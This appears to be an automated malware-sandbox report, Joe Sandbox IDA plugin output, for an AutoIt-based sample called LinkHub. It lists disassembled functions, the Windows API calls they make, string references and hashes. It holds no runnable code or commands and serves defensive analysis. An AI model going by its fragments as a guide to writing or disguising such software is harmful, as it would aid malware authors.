Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: c3915eb1a094206a36f637a4e7e54b06171eb60cd69b3b4cd72a0bb0e3d83d92
Instruction ID: a9b4d2f524a68f534bb71f0909545e52b70c8de71d85eb11f13f1444f52b768c
Opcode Fuzzy Hash: c3915eb1a094206a36f637a4e7e54b06171eb60cd69b3b4cd72a0bb0e3d83d92
Instruction Fuzzy Hash: 32416F71A00204EFDF049F55EC85AAA77B8FF44314F1580A5EE00EB2A6DB70DE65DBA4

Function 00DD61A9 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E15287

Part of subcall function 00DD8577: _wcslen.LIBCMT ref: 00DD858A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DD6299

Strings

AutoIt - , xrefs: 00DD620D
\+, xrefs: 00E15295
Line %d: , xrefs: 00E15305

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt - $\+
API String ID: 2289894680-1638154863
Opcode ID: 4583df936cfcebc27f99852c2207da061f2d91e1a0277f3ab3b3fa36c501d1a6
Instruction ID: 914e88c5426811314b82a023c4538fc9689d0a56a84705f6e469cee5bae3b92f
Opcode Fuzzy Hash: 4583df936cfcebc27f99852c2207da061f2d91e1a0277f3ab3b3fa36c501d1a6
Instruction Fuzzy Hash: 7441A471408305AEC710EB64DC45ADF7BE8EF59320F00451FF599A21A1EB70E649C7B6

Function 00E08A2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,OV,00E0894C,?,00E99CE8,0000000C,00E089AB,?,OV,?,00E1564F), ref: 00E08A84
GetLastError.KERNEL32 ref: 00E08A8E
__dosmaperr.LIBCMT ref: 00E08AB9

Strings

OV, xrefs: 00E08A30

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: OV
API String ID: 2583163307-2262073888
Opcode ID: 69ed0a9c0fd93da2a4f37351091013af04ca10fdebcdc42f52b34e65fdceb78b
Instruction ID: fcc30edd3380ebd7c89658e099ba11aff12311f6b62bd55ffdc67ea2c6ecf1aa
Opcode Fuzzy Hash: 69ed0a9c0fd93da2a4f37351091013af04ca10fdebcdc42f52b34e65fdceb78b
Instruction Fuzzy Hash: 12016B337051601EC7646234AD4577F27A5CF96738F29211BF894BB5C2DF708CC05590

Function 00DD58CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00DD58BE,SwapMouseButtons,00000004,?), ref: 00DD58EF
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00DD58BE,SwapMouseButtons,00000004,?), ref: 00DD5910
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00DD58BE,SwapMouseButtons,00000004,?), ref: 00DD5932

Strings

Control Panel\Mouse, xrefs: 00DD58ED

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: a5ff6a57f46f3c2323125e340e74d25675c374b2cd393fa8b2d768c99a741b71
Instruction ID: 5c091242328cbdda4952a5086a46ae9eb0686b1deb3d3f4ce0f9cfebd58939e1
Opcode Fuzzy Hash: a5ff6a57f46f3c2323125e340e74d25675c374b2cd393fa8b2d768c99a741b71
Instruction Fuzzy Hash: B8115A75611618FFDB218FA5EC84DAF77BDEF00760B50442AE801E7214E2719E459B64

Function 00DE2B20 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00DE3006

Strings

CALL, xrefs: 00DE2FD6
bn, xrefs: 00DE2B36, 00DE2E8D

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL$bn
API String ID: 1385522511-1920074456
Opcode ID: ce4e953f9f9f1151804c19de9f1c0b6247dbbf80c6371cecc49a667043ec6af3
Instruction ID: d996a847112be824a1cf02b32288ee7041b343cf978df1874ba0282dacbc4218
Opcode Fuzzy Hash: ce4e953f9f9f1151804c19de9f1c0b6247dbbf80c6371cecc49a667043ec6af3
Instruction Fuzzy Hash: 7F22AB706083819FC714EF25C885A3ABBE5FF89314F24895DF59A9B361D731E940CBA2

Function 00DD3A95 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00E1413B

Part of subcall function 00DD5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DD55D1,?,?,00E14B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DD5871

Part of subcall function 00DD3A57: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DD3A76

Strings

X, xrefs: 00E14109
`u, xrefs: 00E14134

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`u
API String ID: 779396738-2693526198
Opcode ID: e337d50518e0f872aff67e308e4102a0cb2fe17c3a0834f5f1d17b2416a2c9db
Instruction ID: e21e9cee50a9f5b6c8a7ffbefb756abf971e0d5ab60b6b1a64497f6b80f42d22
Opcode Fuzzy Hash: e337d50518e0f872aff67e308e4102a0cb2fe17c3a0834f5f1d17b2416a2c9db
Instruction Fuzzy Hash: 9F216F71A042589BCB019F94DC05AEE7BF8AF49304F00805AE545B7381DBF49A8D8FB2

Function 00DF014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00DF09D8

Part of subcall function 00DF3614: RaiseException.KERNEL32(?,?,?,00DF09FA,74DE2E40,?,?,?,?,?,?,?,00DF09FA,?,00E99758), ref: 00DF3674

__CxxThrowException@8.LIBVCRUNTIME ref: 00DF09F5

Strings

Unknown exception, xrefs: 00DF0A02

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 4fff2df30670f6d51717abee059c2ff498195d39c57cc89043a02d08d0b5a718
Instruction ID: aa371c667ff4b729773a2a49f79b1818780ee4145daf25a177dd7f7c56499965
Opcode Fuzzy Hash: 4fff2df30670f6d51717abee059c2ff498195d39c57cc89043a02d08d0b5a718
Instruction Fuzzy Hash: 5DF0A43490030DB78B10BAA8EC468BE7B6C9E00750B5AC125BB18E7593FB70EA5589F0

Function 00E589B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00E58D52
TerminateProcess.KERNEL32(00000000), ref: 00E58D59
FreeLibrary.KERNEL32(?,?,?,?), ref: 00E58F3A

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: aec2b7e936fb8616e285a8e5c536cba2a731b9688016de39a66f9d12c973318a
Instruction ID: d19f821532000c8aaf098dfbad26c02ccdc24610ad67ad58b84e834a7b84406d
Opcode Fuzzy Hash: aec2b7e936fb8616e285a8e5c536cba2a731b9688016de39a66f9d12c973318a
Instruction Fuzzy Hash: 7F128D71A08340DFC714DF24C584B5ABBE5FF88319F14995DE889AB352DB30E949CBA2

Function 00E59AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E59B87
_strcat.LIBCMT ref: 00E59BC6
_wcslen.LIBCMT ref: 00E59C14

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _wcslen$_strcat
String ID:
API String ID: 306214811-0
Opcode ID: af73efd9fca76db8f0645194227a62335e1dcb342fbd07d7b7a80f130dacea5f
Instruction ID: be38115c86eee4908efad2cb882552d94fc1144a4611ac5f59b632acd468e050
Opcode Fuzzy Hash: af73efd9fca76db8f0645194227a62335e1dcb342fbd07d7b7a80f130dacea5f
Instruction Fuzzy Hash: 1AA14831600605EFCB18DF18D5D19A9BBB1FF45315B6098AEE80A9F392DB31E946CF90

Function 00E0970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00E097BA,FF8BC369,00000000,00000002,00000000), ref: 00E09744
GetLastError.KERNEL32(?,00E097BA,FF8BC369,00000000,00000002,00000000,?,00E05ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00DF6F41), ref: 00E0974E
__dosmaperr.LIBCMT ref: 00E09755

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 5be72c77e94a98dbb231d1c811d4a165deeaad511947c453ff009b975d888774
Instruction ID: 33f219899bba16934a5f9636e3d32f0f5eb1cf74cf7eae6ce200d7a95590b9b1
Opcode Fuzzy Hash: 5be72c77e94a98dbb231d1c811d4a165deeaad511947c453ff009b975d888774
Instruction Fuzzy Hash: 2A014033720114AFCB159F9ADC05CAF3719DF85730B284246F811E71D2EA70DD919BA0

Function 00E40D18 Relevance: 4.5, APIs: 3, Instructions: 21COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000030,00000000,?,00000002,00000000,?,00E40B03,00000000,?,00000000,?,00E13A00,00000000), ref: 00E40D2E
GetCurrentProcess.KERNEL32(?,00000000,?,00E40B03,00000000,?,00000000,?,00E13A00,00000000), ref: 00E40D36
DuplicateHandle.KERNELBASE(00000000,?,00E40B03,00000000,?,00000000,?,00E13A00,00000000), ref: 00E40D3D

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CurrentProcess$DuplicateHandle
String ID:
API String ID: 1294930198-0
Opcode ID: 6229377b34042cf8e49245989e6f043c2a281a07b0024c952ffa373ae6b3a3e8
Instruction ID: c8d93f34f2c57af76891e3d24f0ca7d95b78452b8165481f39951f441deb462b
Opcode Fuzzy Hash: 6229377b34042cf8e49245989e6f043c2a281a07b0024c952ffa373ae6b3a3e8
Instruction Fuzzy Hash: 18D05B77A44305BFC7011BD6FC09F77777CDBC6B66F504029F705A51519AF054049621

Function 00DEFFE0 Relevance: 3.1, APIs: 2, Instructions: 94processCOMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00DF007D
CreateToolhelp32Snapshot.KERNEL32 ref: 00DF008F

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CloseCreateHandleSnapshotToolhelp32
String ID:
API String ID: 3280610774-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: db4c839c56637e8e90028f000f0f37709b1e4613c7469bd31157686b59eb3595
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 2B31C370A00109DBC718CF58D490A79FBA6FB49304B29C6A5E949CB256DB32EDC1CBE0

Function 00DD396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DD3A3C

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 547abeeb934b26423248bc8c09e758ea0afe17076bd3aa12eec5e95ef9b0e934
Instruction ID: 34d820cc834dd697c58990cd5fa9ad2147d2b0999fc4fe9efa8d09e866361274
Opcode Fuzzy Hash: 547abeeb934b26423248bc8c09e758ea0afe17076bd3aa12eec5e95ef9b0e934
Instruction Fuzzy Hash: EB3193B06043019FD720DF25D884797BBE8FB4A308F00092EE6D9A7341E7B5A948CB62

Function 00E04EB8 Relevance: 3.1, APIs: 2, Instructions: 67COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00E04F04
GetFileType.KERNELBASE(00000000), ref: 00E04F16

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 8474066a018236ef8dc19dc3e61f77a11464ad4d6670cdf72c0c52b044a7e0f3
Instruction ID: 15d828652c5e8986dd1de94dcf6407f443854f85793db8b4eef39127100c8a1b
Opcode Fuzzy Hash: 8474066a018236ef8dc19dc3e61f77a11464ad4d6670cdf72c0c52b044a7e0f3
Instruction Fuzzy Hash: D911A5F17087434AC7308A3E9E886226A94A796378B38375AD6B6E75F5C620D8C69250

Function 00E40AC4 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000018,00000FA0,?,00000000,?,00E13A00,00000000), ref: 00E40AEC
InterlockedExchange.KERNEL32(00000038,00000000), ref: 00E40B0E

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
String ID:
API String ID: 4104817828-0
Opcode ID: 993f34257fcdd57f5ac0f19c37601e69656f2cb3bba10748d6521d8a566cefe8
Instruction ID: 3f32b20fa851bb7666f63b4dc58964a521d4e42944ea21c0d52ec8d92c85a153
Opcode Fuzzy Hash: 993f34257fcdd57f5ac0f19c37601e69656f2cb3bba10748d6521d8a566cefe8
Instruction Fuzzy Hash: 25F017B16007059FC3209F56D9448A7FBECFF95720B40482EE58A87A20C7B4B049CB90

Function 00DD331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00DD333D

Part of subcall function 00DD32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00DD32FB
Part of subcall function 00DD32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DD3312

Part of subcall function 00DD338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00DD3368,?), ref: 00DD33BB
Part of subcall function 00DD338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00DD3368,?), ref: 00DD33CE
Part of subcall function 00DD338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00EA2418,00EA2400,?,?,?,?,?,?,00DD3368,?), ref: 00DD343A
Part of subcall function 00DD338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00EA2418,?,?,?,?,?,?,?,00DD3368,?), ref: 00DD34BB

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00DD3377

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: d60fe5b3bc9c616727d120fb3463afbcb61cc98a6fadf0aa2ef892d15d28aa6f
Instruction ID: f35ab7b224e5fb2ab7319aa93579064373237fa89090772346b5f0e0798862fc
Opcode Fuzzy Hash: d60fe5b3bc9c616727d120fb3463afbcb61cc98a6fadf0aa2ef892d15d28aa6f
Instruction Fuzzy Hash: B6F09031908345AFDB006BB9FD0AB253B90E70B749F00480AB708751E2CBBAA15C8B61

Function 00E40B4C Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

Part of subcall function 00E41312: InterlockedExchange.KERNEL32(?,?), ref: 00E41322
Part of subcall function 00E41312: EnterCriticalSection.KERNEL32(00000000,?), ref: 00E41334
Part of subcall function 00E41312: TerminateThread.KERNEL32(00000000,000001F6), ref: 00E41342
Part of subcall function 00E41312: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00E41350
Part of subcall function 00E41312: CloseHandle.KERNEL32(00000000), ref: 00E4135F
Part of subcall function 00E41312: InterlockedExchange.KERNEL32(?,000001F6), ref: 00E4136F
Part of subcall function 00E41312: LeaveCriticalSection.KERNEL32(00000000), ref: 00E41376

CloseHandle.KERNELBASE(?,?,00E40BBF), ref: 00E40B5D
DeleteCriticalSection.KERNEL32(?,?,00E40BBF), ref: 00E40B83

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CriticalSection$CloseExchangeHandleInterlocked$DeleteEnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 2929296749-0
Opcode ID: eb315df40a69b16a7059520f2bdd09a5560c73e1b947e4fff31f9248f8804759
Instruction ID: 5749f90ea3f306f2a52222b283222cc99327c4ad7a72fc4d3e37789e4ba76619
Opcode Fuzzy Hash: eb315df40a69b16a7059520f2bdd09a5560c73e1b947e4fff31f9248f8804759
Instruction Fuzzy Hash: C7E01A32404B01DFCB316F65FD05A56BBE4FF14321F21D82EE19AA6921CBB0A8989B14

Function 00DDCAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00DDCEEE

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
